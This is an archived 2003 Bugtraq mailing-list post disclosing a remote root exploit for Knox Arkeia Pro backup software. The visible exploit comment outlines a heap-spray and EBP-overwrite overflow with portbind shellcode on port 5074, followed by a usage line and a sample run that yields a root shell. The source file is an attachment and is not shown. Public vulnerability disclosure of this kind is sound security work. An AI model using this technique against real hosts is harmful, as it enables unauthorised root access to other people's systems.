lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030918230614.46980.qmail@web20503.mail.yahoo.com>
Date: Thu, 18 Sep 2003 16:06:14 -0700 (PDT)
From: "A. C." <bugtraq_vuln@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Knox Arkeia Pro v5.1.12 remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.12 backup
software from http://www.arkeia.com.

 
 

/*
 * Knox Arkiea arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions
are presumed vulnerable.
 * 
 * NULLs out least significant byte of EBP to pull EIP
out of overflow buffer.
 * A previous request forces a large allocation of
NOP's + shellcode in heap
 * memory.  Find additional targets by searching the
heap for NOP's after a 
 * crash.  safeaddr must point to any area of memory
that is read/writable
 * and won't mess with program/shellcode flow. 
 *
 * ./ark_sink host targetnum 
 * [user@...t dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *
 */ 
 

__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
View attachment "ark_sink.c" of type "text/plain" (5556 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ